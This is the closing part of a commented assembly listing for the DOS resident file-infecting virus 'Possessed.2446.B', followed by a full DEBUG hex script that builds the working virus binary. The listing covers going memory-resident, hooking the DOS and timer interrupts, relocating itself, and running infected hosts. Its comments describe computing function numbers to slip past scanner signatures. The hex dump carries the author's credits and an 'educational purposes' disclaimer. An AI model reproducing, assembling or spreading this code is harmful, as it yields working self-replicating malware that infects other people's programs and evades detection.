; and jumps to the host through the DosInterrupt pointer used as scratch.
ExecuteExeVictim:
pop es
mov ax,es
add ax,ExeSs+100h
mov ss,ax
mov sp,ExeSp+100h
mov ax,es
add ax,ExeCs+100h
mov DosIntSegment+100h,ax
mov ax,ExeIp+100h
mov DosIntOffset+100h,ax
clc
jmp DosInterrupt+100h

; Second half of the relocation started in ExeNotInMemory: copies the
; remaining CX bytes, then falls into FirstGenerationEntry.
SecondCodeMove:
cld
repe movsb
xor ax,ax
mov es,ax
; Sets the residency marker at 0000:01EC to 1, then takes the segment that
; was pushed on entry, adds 16 paragraphs and far-returns to
; SetUpPossessed in that segment, so that offset 0 of this listing lines up
; with the start of the body.
FirstGenerationEntry:
mov byte ptr es:MemoryMarkerLoc,1
pop ax
add ax,16
push ax
mov ax,offset SetUpPossessed
push ax
retf

assume cs:Possessed, ds:Possessed

; Installation routine. In order:
;  1. Lowers SP by 100h and sets DS = SS = CS; records the PSP segment
;     (CS - 16) and the environment segment from PSP:2Ch.
;  2. Saves the 12 bytes at PSP:0Ah-15h behind the body and points the
;     PSP terminate address (PSP:0Ah) at isTerminate. Presumably this is how
;     control reaches isTerminate after the terminate-and-stay-resident
;     call below - confirm against DOS termination handling.
;  3. Refreshes the plain-text PossessedId from its encoded copy.
;  4. Hooks INT 21h with isDos and INT 08h with isClock, saving the
;     original vectors. The function numbers are not written as immediates:
;     3521h is derived from the first code word of ExeEntry plus a constant,
;     and the following values are derived from AX by arithmetic, so a scan
;     for the literal AX=3521h/2521h load sequences does not match here.
;  5. Loads Hour from ActivateLength and clears Timer.
;  6. Issues INT 21h/AH=49h for the PSP segment, then goes resident with
;     INT 21h/AH=31h, keeping (offset VirusStack / 16) + 20h paragraphs,
;     which is the 2944 bytes listed in the profile.
SetUpPossessed:
mov ax,sp
sub ax,100h
mov sp,ax
mov ax,cs
mov ds,ax
mov ss,ax
push ds
sub ax,16
mov es,ax
mov Psp,es
push ax
mov ax,es:[2ch]
mov Environment,ax
pop ax
push ds
push es
mov ds,ax
push cs
pop es
mov si,0ah
mov di,offset VirusStack
mov cx,6
cld
repe movsw ; save PSP:0Ah..15h
mov bx,offset isTerminate
mov ds:[0ah],bx
mov ds:[0ch],cs
pop es
pop ds
pop es
mov si,offset EncryptedPossessedId
mov cx,(FaceData-EncryptedPossessedId)
push cx
mov al,25h
call Scrambler ; decode in place
mov di,offset PossessedId
push si
cld
repe movsb ; overwrite the plain-text ID with the decoded copy
pop si
pop cx
neg al
call Scrambler ; encode again
mov ax,word ptr ExeEntry
add ax,(3521h-3306h) ; AX = 3521h: get INT 21h vector
int 21h
mov DosIntOffset,bx
mov DosIntSegment,es
mov dx,offset isDos
sub ah,10h ; AX = 2521h: set INT 21h vector
call UseDos
mov Timer,0
mov dl,ActivateLength
mov Hour,dl
add ax,(3508h-2521h) ; AX = 3508h, assuming the previous call left AX unchanged
call UseDos
mov ClockIntOffset,bx
mov ClockIntSegment,es
mov dx,offset isClock
sub ah,10h ; AX = 2508h: set INT 08h vector
call UseDos
push cs
pop ds
mov es,Psp
mov ah,49h
call UseDos
mov dx,offset VirusStack
mov cl,4
shr dx,cl
add dx,20h
mov ah,31h
call UseDos
; Runs the host program after installation.
;  1. Restores the 12 bytes at PSP:0Ah-15h saved by SetUpPossessed.
;  2. If FirstGenerationFlag is 1 (the assembled listing itself) the flag
;     is cleared and the process simply exits.
;  3. Otherwise an EXEC parameter block is built from the installing
;     process's PSP (environment, command tail at 80h, FCBs at 5Ch and 6Ch)
;     and the host is started with INT 21h/AX=4B00h.
;     - DOS 3 or later: the program path is looked up in the first 200
;       bytes of the environment segment (a byte 01h with ':' three bytes
;       further on); the EXEC goes through UseDos, bypassing the hook.
;     - Older DOS, or path not found: the base name stored in NameofVictim
;       is used instead; on older DOS the EXEC is issued with a plain
;       INT 21h and therefore passes through the resident handler.
;  4. If the EXEC fails, the '$'-terminated first line of PossessedId is
;     printed (the "DisplayedText" in the profile).
;  5. The child's return code is fetched (AH=4Dh) and the process exits
;     with AH=4Ch.
isTerminate:
push cs
push cs
pop ds
mov es,Psp
mov si,offset VirusStack
mov di,0ah
mov cx,6
cld
repe movsw ; restore PSP:0Ah..15h
pop es
cmp FirstGenerationFlag,1
jne NotFirstGen
mov FirstGenerationFlag,0
jmp GetReturnCode

NotFirstGen:
mov ax,Psp
mov si,offset ExecParam
mov [si+4],ax
mov word ptr [si+2],80h ; command tail = PSP:0080h
mov [si+8],ax
mov word ptr [si+6],5ch ; first FCB = PSP:005Ch
mov [si+12],ax
mov word ptr [si+10],6ch ; second FCB = PSP:006Ch
mov ax,Environment
mov [si],ax
mov ah,30h
int 21h
mov DosVersion,al
cmp al,3
jc NameNotInEnvironment
mov ds,Environment
xor si,si
mov cx,200
FindFileName:
cmp byte ptr [si],1
jne CheckNextChar
cmp byte ptr [si+03],':'
jne CheckNextChar
mov dx,si
add dx,2 ; DS:DX = path that follows the 0001h word
jmp FoundFileName

CheckNextChar:
inc si
loop FindFileName
NameNotInEnvironment:
push cs
pop ds
mov si,offset NameofVictim
mov di,offset VirusAsciiz
mov cx,13
cld
repe movsb
mov dx,offset VirusAsciiz

assume cs:Possessed, ds:nothing

FoundFileName:
cli
mov ViruSs,ss ; SS:SP is saved around the EXEC and reloaded afterwards
mov ViruSp,sp
sti
mov ax,4b00h
mov bx,offset ExecParam
cmp DosVersion,3
jc OldDos
call UseDos
jmp VictimExecuted

OldDos:
int 21h
VictimExecuted:
cli
mov ss,ViruSs
mov sp,ViruSp
sti
push cs
pop ds
jnc GetReturnCode ; carry still reflects the EXEC result
mov dx,offset PossessedId
mov ah,9
int 21h
GetReturnCode:
mov ah,4dh
int 21h
mov ah,4ch
int 21h

; 13-byte copy of the base name of the file processed most recently
; (filled in GotEndOfFileName before the body is written to that file).
NameofVictim db 13 dup (?)

; Entry point of an infected COM file, reached from the Jumper stub with
; SI = LocEndOfFile. Tests the residency marker at 0000:01EC (as a word
; here, whereas ExeEntry tests a byte):
;   marker set   -> copy the 90 saved host bytes from SaveVictimCode back
;                   to 100h and jump to 100h, i.e. run the host;
;   marker clear -> NotInMemory.
ComEntry:
add si,100h
push es
xor ax,ax
mov es,ax

cmp word ptr es:MemoryMarkerLoc,0
je NotInMemory
pop es
sub si,5ah ; 5Ah = 90 = size of SaveVictimCode
mov di,100h
mov cx,(offset VirusStack-offset SaveVictimCode)/2
cld
repe movsw
mov bx,100h
clc
jmp bx

; Relocation used when the code is not yet resident.
; NotInMemory subtracts (offset VirusStack) from SI; ExeNotInMemory is also
; entered directly from ExeEntry with SI = 100h. From there the bytes from
; offset 0 up to ExeNotInMemory are copied to ES:0100h, CX is loaded with
; the number of bytes still to copy, and execution continues in the copy at
; SecondCodeMove through a far jump built in the DosInterrupt pointer.
; The ES pushed just before the jump is the value FirstGenerationEntry pops.
NotInMemory:
sub si,offset VirusStack
ExeNotInMemory:
pop es

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov di,100h
mov cx,offset ExeNotInMemory
shr cx,1
cld
repe movsw
mov cx,(offset VirusStack-offset ExeNotInMemory)
mov DosIntSegment+100h,es
mov DosIntOffset+100h,offset SecondCodeMove+100h
push es
jmp cs:DosInterrupt+100h


; ---- tail of the body and run-time work area ----
SaveVictimCode db 90 dup (?) ; first 90 bytes of an infected COM host, restored by ComEntry
VirusStack dw ? ; "offset VirusStack" is used throughout as the body length written to files
VirusAsciiz db 13 dup (?) ; host name handed to EXEC when no path is found in the environment
ExecParam dw 7 dup (?) ; EXEC parameter block filled in NotFirstGen
dontknow db 21 dup (?) ; not referenced anywhere in this listing
VirusDta db 41 dup (?) ; private DTA used for the find-first calls in DosHandler

Possessed ends

end PossessedEntry

── POS2446B.ASM ENDS HERE ──────────────────────────────────────────


── POS2446B.SCR STARTS HERE ────────────────────────────────────────

N POS2446B.COM
E 0100 2E 8B 1E 0C 01 2E 8B 36 0E 01 FF E3 B4 0B 57 0B
E 0110 0D 50 4F 53 53 45 53 53 45 44 21 20 42 77 61 21
E 0120 20 68 61 21 20 68 61 21 20 68 61 21 20 68 61 21
E 0130 24 08 20 0A 0D 41 75 74 68 6F 72 3A 20 4A 6F 6E
E 0140 4A 6F 6E 20 47 75 6D 62 61 20 6F 66 20 41 64 55
E 0150 0A 1A 6E 65 73 2E 0D 0A 42 72 6F 75 67 68 74 20
E 0160 74 6F 20 79 6F 75 20 6C 69 76 65 20 62 79 20 48
E 0170 45 58 2D 46 49 4C 45 53 20 4E 6F 2E 20 32 0D 0A
E 0180 0A 48 45 58 2D 46 49 4C 45 53 20 61 6E 64 20 50
E 0190 75 74 6F 6B 73 61 20 4B 61 77 61 79 61 6E 20 61
E 01A0 72 65 20 6E 6F 74 20 72 65 73 70 6F 6E 73 69 62
E 01B0 6C 65 20 66 6F 72 20 61 63 74 75 61 6C 2C 20 69
E 01C0 6D 70 6C 69 65 64 20 61 6E 64 2F 6F 72 0D 0A 69
E 01D0 6D 61 67 69 6E 61 72 79 20 64 61 6D 61 67 65 20
E 01E0 62 72 6F 75 67 68 74 20 61 62 6F 75 74 20 62 79
E 01F0 20 74 68 65 20 75 73 65 2C 20 6D 69 73 75 73 65
E 0200 20 6F 72 20 6E 6F 6E 2D 75 73 65 20 6F 66 20 74
E 0210 68 69 73 20 76 69 72 69 69 2E 20 54 68 65 0D 0A
E 0220 70 65 72 73 6F 6E 20 77 68 6F 20 65 78 65 63 75
E 0230 74 65 73 20 74 68 69 73 20 76 69 72 69 69 20 62
E 0240 65 61 72 73 20 66 75 6C 6C 20 72 65 73 70 6F 6E
E 0250 73 69 62 69 6C 69 74 79 20 66 6F 72 20 68 69 73
E 0260 2F 68 65 72 20 61 63 74 69 6F 6E 73 2E 0D 0A 0A
E 0270 54 68 69 73 20 76 69 72 69 69 20 69 73 20 73 74
E 0280 72 69 63 74 6C 79 20 66 6F 72 20 65 64 75 63 61
E 0290 74 69 6F 6E 61 6C 20 61 6E 64 2F 6F 72 20 72 65
E 02A0 73 65 61 72 63 68 20 70 75 72 70 6F 73 65 73 20
E 02B0 6F 6E 6C 79 2E 0D 0A 0A 24 08 20 1A 0E 1F BA 07
E 02C0 01 B4 09 CD 21 B4 4C CD 21 06 33 C0 8E C0 E9 52
E 02D0 07 0D 50 4F 53 53 45 53 53 45 44 21 20 42 77 61
E 02E0 21 20 68 61 21 20 68 61 21 20 68 61 21 20 68 61
E 02F0 21 24 08 20 0A 0D 41 75 74 68 6F 72 3A 20 4A 6F
E 0300 6E 4A 6F 6E 20 47 75 6D 62 61 20 6F 66 20 41 64
E 0310 55 0A 1A EB 37 90 06 00 4A 00 C5 0D 2E 03 C5 0D
E 0320 C8 04 91 0E 08 04 35 05 20 00 05 00 C9 21 68 24
E 0330 C9 01 3A 0F A9 00 03 04 08 04 0A 06 00 00 00 00
E 0340 00 00 00 00 00 00 00 00 7B 0E 81 0E 9C 3D 00 4B
E 0350 75 7C 1E 06 56 57 50 53 51 52 8B DA 8A 1F 0E 1F
E 0360 88 1E 08 07 88 1E 10 07 B4 2F E8 37 04 06 53 B4
E 0370 1A BA C0 09 E8 2D 04 B9 23 00 BA 08 07 B4 4E E8
E 0380 22 04 73 1F BA 10 07 B4 4E E8 18 04 73 15 5A 1F
E 0390 B4 1A E8 0F 04 5A 59 5B 58 5F 5E 07 1F E8 1A 00
E 03A0 EB 2C 90 BA C0 09 83 C2 1C 8B DA 8A 0E 08 07 88
E 03B0 0F C6 47 01 3A E8 02 00 EB D4 1E 06 56 57 50 53
E 03C0 51 52 EB 10 90 5A 59 5B 58 5F 5E 07 1F C3 9D 2E
E 03D0 FF 2E 4F 00 2E 8C 1E 5B 00 2E 89 16 5D 00 8B F2
E 03E0 83 C6 02 8B DE 80 3C 5C 75 06 8B DE 43 EB 06 90
E 03F0 80 3C 00 74 15 46 EB ED B8 24 25 2E 8B 16 57 00
E 0400 2E 8E 1E 59 00 E8 9C 03 EB BB 8B F3 0E 07 BF DE
E 0410 08 B9 0D 00 FC F3 A4 1E 52 06 1F B8 24 35 E8 83
E 0420 03 8C 06 59 00 89 1E 57 00 B8 24 25 BA C8 04 E8
E 0430 72 03 5A 1F B8 00 43 E8 6A 03 72 BC 2E 89 0E 5F
E 0440 00 B8 01 43 B9 20 00 E8 5A 03 72 EE B8 02 3D E8
E 0450 52 03 72 E6 2E A3 61 00 8B D8 B8 00 57 E8 44 03
E 0460 2E 89 16 65 00 2E 89 0E 63 00 BB FE FF B4 48 E8
E 0470 32 03 73 07 B4 48 E8 2B 03 72 BF 2E A3 69 00 33
E 0480 C9 8B D1 2E 8B 1E 61 00 B8 02 42 E8 16 03 72 07
E 0490 2E A3 67 00 E8 28 03 72 11 2E 8B 0E 67 00 33 D2
E 04A0 2E 8E 1E 69 00 B4 3F E8 FA 02 72 36 0E 07 33 F6
E 04B0 81 3C 4D 5A 75 0A 81 7C 12 70 19 74 25 EB 5C 90
E 04C0 8B F1 81 EE 2B 04 78 06 81 3C 41 4B 74 03 EB 4B
E 04D0 90 BE 10 00 BF 08 00 B9 21 00 FC F3 A7 74 03 E9
E 04E0 49 01 0E 1F 8E 06 69 00 B4 49 E8 B7 02 8B 1E 61
E 04F0 00 8B 16 65 00 8B 0E 63 00 B8 01 57 E8 A5 02 B4
E 0500 3E E8 A0 02 8E 1E 5B 00 2E 8B 16 5D 00 2E 8B 0E
E 0510 5F 00 B8 01 43 E8 8C 02 E9 AA FE 06 2E 8E 1E 5B
E 0520 00 2E 8B 36 5D 00 8A 14 80 EA 40 1F B0 04 80 3E
E 0530 6E 00 0B 74 08 38 06 6E 00 75 02 B0 03 A2 6E 00
E 0540 BE 16 05 B9 0B 00 B0 17 E8 7F 02 BF DE 08 E8 83
E 0550 02 9C F6 D8 E8 73 02 9D 72 12 80 3E 4D 00 03 73
E 0560 03 E9 7E FF C6 06 6E 00 0B EB 15 90 B4 36 E8 33
E 0570 02 33 D2 F7 E3 F7 E1 0B D2 75 05 3D C4 09 72 E1
E 0580 2E 8B 1E 61 00 E8 37 02 72 D7 2E 8E 1E 69 00 33
E 0590 F6 81 3C 4D 5A 75 13 E9 40 01 2E 8B 1E 0C 01 2E
E 05A0 8B 36 0E 01 FF E3 B4 0B 57 0B 1E 1E BF 34 09 B9
E 05B0 2D 00 FC F3 A5 07 0E 1F 8B 16 67 00 80 3E 6E 00
E 05C0 0B 75 0F 89 16 DF 02 81 EA A3 FF 89 16 DD 02 EB
E 05D0 13 90 52 81 C2 EB 09 89 16 DD 02 5A 81 C2 8E 09
E 05E0 89 16 DF 02 BE D1 02 33 FF B9 08 00 FC F3 A5 BE
E 05F0 08 00 B9 21 00 FC F3 A5 E8 C4 01 1F 2E 8B 0E 67
E 0600 00 2E 80 3E 6E 00 0B 75 04 81 E9 8E 09 33 D2 B4
E 0610 40 E8 90 01 73 03 E9 48 FF 0E 1F BA 00 00 B9 8E
E 0620 09 B4 40 E8 7E 01 72 EE E9 B7 FE 2E 8E 1E 5B 00
E 0630 2E 8B 16 5D 00 B4 41 E8 6A 01 E9 A5 FE 9C 2E FF
E 0640 06 6B 00 75 07 2E FE 0E 6D 00 74 06 9D 2E FF 2E
E 0650 53 00 9D B8 06 00 CD 10 0E 1F 33 DB 33 D2 BE 63
E 0660 05 C7 06 7F 01 C8 00 C7 06 81 01 00 00 E8 3E 00
E 0670 C7 06 7F 01 C9 00 C7 06 81 01 01 00 E8 2F 00 C7
E 0680 06 7F 01 BD 00 C7 06 81 01 FF FF E8 20 00 C7 06
E 0690 7F 01 C9 00 C7 06 81 01 FF FF E8 11 00 C7 06 7F
E 06A0 01 BD 00 C7 06 81 01 01 00 E8 02 00 EB B0 56 B0
E 06B0 01 B9 02 00 51 56 8A 1C 0A DB 74 16 8B CB 03 0E
E 06C0 7F 01 8A 54 01 03 16 81 01 B4 0C CD 10 83 C6 02
E 06D0 EB E4 5E 32 C0 59 E2 DC 5E C3 C7 44 12 70 19 8B
E 06E0 44 0E 05 10 00 2E A3 73 00 8B 44 10 2E A3 75 00
E 06F0 8B 44 14 2E A3 79 00 8B 44 16 05 10 00 2E A3 77
E 0700 00 8B 44 04 83 7C 02 00 74 01 48 BB 00 02 F7 E3
E 0710 03 44 02 83 D2 00 05 0F 00 83 D2 00 25 F0 FF 2E
E 0720 A3 7B 00 2E 89 16 7D 00 05 8E 09 83 D2 00 72 5E
E 0730 F7 F3 0B D2 74 01 40 89 44 04 89 54 02 2E A1 7B
E 0740 00 2E 8B 16 7D 00 BB 10 00 F7 F3 2B 44 08 2D 10
E 0750 00 89 44 16 C7 44 14 18 08 89 44 0E C7 44 10 8E
E 0760 0A 2E 8B 1E 61 00 E8 56 00 B9 1C 00 33 D2 B4 40
E 0770 E8 31 00 0E 1F 8B 16 7B 00 8B 0E 7D 00 B8 00 42
E 0780 E8 21 00 BA 00 00 B9 8E 09 B4 40 E8 16 00 E9 51
E 0790 FD 33 C0 8E C0 26 8E 16 F6 01 26 8B 26 F4 01 58
E 07A0 07 5D F9 C3 55 06 50 33 C0 8E C0 26 89 26 F4 01
E 07B0 26 8C 16 F6 01 58 07 9C 2E FF 1E 4F 00 5D C3 33
E 07C0 C9 8B D1 B8 00 42 E8 DB FF C3 51 56 28 04 46 E2
E 07D0 FB 5E 59 C3 56 51 FC F3 A6 74 01 F9 59 5E C3 5A
E 07E0 66 64 64 58 65 5B 45 5A 66 64 32 75 74 78 78 6A
E 07F0 78 78 6A 69 46 45 67 9C 86 46 45 8D 86 46 45 8D
E 0800 86 46 45 8D 86 46 45 8D 86 46 49 2D 45 2F 32 66
E 0810 9A 99 8D 94 97 5F 45 6F 94 93 6F 94 93 45 6C 9A
E 0820 92 87 86 45 94 8B 45 66 89 7A 2F 3F 41 4B 42 4B
E 0830 42 4C 43 4C 44 4C 45 4C 43 4D 46 4D 47 4D 44 4E
E 0840 48 4E 49 4E 4A 4E 45 4F 4B 4F 4C 4F B6 4A B5 4A
E 0850 B5 4B B4 4B B3 4B B2 4B B4 4C B1 4C B0 4C B3 4D
E 0860 AF 4D AE 4D AD 4D B2 4E AC 4E AB 4E 4C 54 4C 55
E 0870 4D 55 4E 55 4F 56 50 56 51 56 52 56 53 56 54 57
E 0880 55 57 56 57 57 57 58 57 59 58 5A 58 5B 58 5C 58
E 0890 5D 58 5A 59 5B 59 5C 59 5D 59 60 59 5F 59 60 59
E 08A0 61 59 62 59 5B 5A 5C 5A 63 5A 64 5A 65 5A 66 5A
E 08B0 67 5A 5C 5B 68 5B 69 5B 6A 5B 6B 5B 6C 5B 6D 5C
E 08C0 6E 5C 6F 5C 70 5D B1 53 B0 54 AF 54 AE 54 AD 55
E 08D0 AC 55 AB 55 AA 55 A9 55 A8 55 A7 56 A6 56 A5 56
E 08E0 A4 56 A3 56 A2 57 A1 57 A0 57 9F 57 9E 57 9D 57
E 08F0 9C 58 9B 58 9A 58 99 58 98 58 9A 59 99 59 98 59
E 0900 97 59 96 59 95 59 94 59 93 59 92 59 99 5A 98 5A
E 0910 91 5A 90 5A 8F 5A 8E 5A 8D 5A 98 5B 8C 5B 8B 5B
E 0920 8A 5B 89 5B 88 5B 87 5B 86 5C 85 5C 84 5C 83 5C
E 0930 76 63 75 64 75 65 74 66 74 67 73 68 73 69 72 6A
E 0940 71 6B 71 6C 70 6D 70 6E 6F 6F 6E 70 6E 71 7B 71
E 0950 6D 72 7A 72 79 72 6D 73 78 73 77 73 76 73 75 73
E 0960 6C 74 71 74 72 74 73 74 74 74 6C 75 6D 75 6E 75
E 0970 6F 75 70 75 6B 76 6C 76 6D 81 6E 81 6F 81 70 80
E 0980 71 80 72 80 73 80 74 7F 75 7F 76 7F 77 7F 78 7E
E 0990 79 7E 7A 7E 7B 7E 7C 7D 7D 7D 7E 7D 7F 7D 80 7D
E 09A0 81 7C 82 7C 83 7C 84 7C 85 7B 86 7B 87 7B 88 7B
E 09B0 89 7A 8A 7A 8B 7A 8C 7A 8D 79 8E 79 8F 79 90 79
E 09C0 91 78 92 78 93 78 94 77 95 77 96 76 97 76 98 75
E 09D0 00 43 3A 2A 2E 43 4F 4D 00 43 3A 2A 2E 45 58 45
E 09E0 00 06 33 C0 8E C0 26 80 3E EC 01 00 75 06 BE 00
E 09F0 01 E9 E8 01 07 8C C0 2E 03 06 73 01 8E D0 2E 8B
E 0A00 26 75 01 8C C0 2E 03 06 77 01 2E A3 51 01 2E A1
E 0A10 79 01 2E A3 4F 01 F8 2E FF 2E 4F 01 FC F3 A4 33
E 0A20 C0 8E C0 26 C6 06 EC 01 01 58 05 10 00 50 B8 6A
E 0A30 07 50 CB 8B C4 2D 00 01 8B E0 8C C8 8E D8 8E D0
E 0A40 1E 2D 10 00 8E C0 8C 06 81 00 50 26 A1 2C 00 A3
E 0A50 7F 00 58 1E 06 8E D8 0E 07 BE 0A 00 BF 8E 09 B9
E 0A60 06 00 FC F3 A5 BB 1C 08 89 1E 0A 00 8C 0E 0C 00
E 0A70 07 1F 07 BE 21 05 B9 42 00 51 B0 25 E8 4B FD BF
E 0A80 08 00 56 FC F3 A4 5E 59 F6 D8 E8 3D FD A1 18 07
E 0A90 05 1B 02 CD 21 89 1E 4F 00 8C 06 51 00 BA 4A 00
E 0AA0 80 EC 10 E8 FE FC C7 06 6B 00 00 00 8A 16 6E 00
E 0AB0 88 16 6D 00 05 E7 0F E8 EA FC 89 1E 53 00 8C 06
E 0AC0 55 00 BA 74 03 80 EC 10 E8 D9 FC 0E 1F 8E 06 81
E 0AD0 00 B4 49 E8 CE FC BA 8E 09 B1 04 D3 EA 83 C2 20
E 0AE0 B4 31 E8 BF FC 0E 0E 1F 8E 06 81 00 BE 8E 09 BF
E 0AF0 0A 00 B9 06 00 FC F3 A5 07 80 3E 4E 00 01 75 08
E 0B00 C6 06 4E 00 00 E9 97 00 A1 81 00 BE 9D 09 89 44
E 0B10 04 C7 44 02 80 00 89 44 08 C7 44 06 5C 00 89 44
E 0B20 0C C7 44 0A 6C 00 A1 7F 00 89 04 B4 30 CD 21 A2
E 0B30 4D 00 3C 03 72 1F 8E 1E 7F 00 33 F6 B9 C8 00 80
E 0B40 3C 01 75 0E 80 7C 03 3A 75 08 8B D6 83 C2 02 EB
E 0B50 15 90 46 E2 EA 0E 1F BE DE 08 BF 90 09 B9 0D 00
E 0B60 FC F3 A4 BA 90 09 FA 2E 8C 16 6F 00 2E 89 26 71
E 0B70 00 FB B8 00 4B BB 9D 09 2E 80 3E 4D 00 03 72 06
E 0B80 E8 21 FC EB 03 90 CD 21 FA 2E 8E 16 6F 00 2E 8B
E 0B90 26 71 00 FB 0E 1F 73 07 BA 08 00 B4 09 CD 21 B4
E 0BA0 4D CD 21 B4 4C CD 21 50 4F 53 32 34 34 36 42 2E
E 0BB0 43 4F 4D 00 81 C6 00 01 06 33 C0 8E C0 26 83 3E
E 0BC0 EC 01 00 74 13 07 83 EE 5A BF 00 01 B9 2D 00 FC
E 0BD0 F3 A5 BB 00 01 F8 FF E3 81 EE 8E 09 07 0E 1F BF
E 0BE0 00 01 B9 13 09 D1 E9 FC F3 A5 B9 7B 00 8C 06 51
E 0BF0 01 C7 06 4F 01 53 08 06 2E FF 2E 4F 01 E9 B9 01
E 0C00 0D 20 20 20 0D 0A 4D 61 62 75 68 61 79 21 0D 0A
E 0C10 0A 54 68 69 73 20 69 73 20 50 6F 73 73 65 73 73
E 0C20 65 64 2E 32 34 34 36 2E 42 20 76 69 72 75 73 20
E 0C30 63 6F 6D 69 6E 67 20 74 6F 20 79 6F 75 20 66 72
E 0C40 6F 6D 20 74 68 65 20 50 68 69 6C 69 70 70 69 6E
E 0C50 65 73 2E 0D 0A 42 72

RCX
0B57
W
Q

── POS2446B.SCR ENDS HERE ──────────────────────────────────────────


EoF.
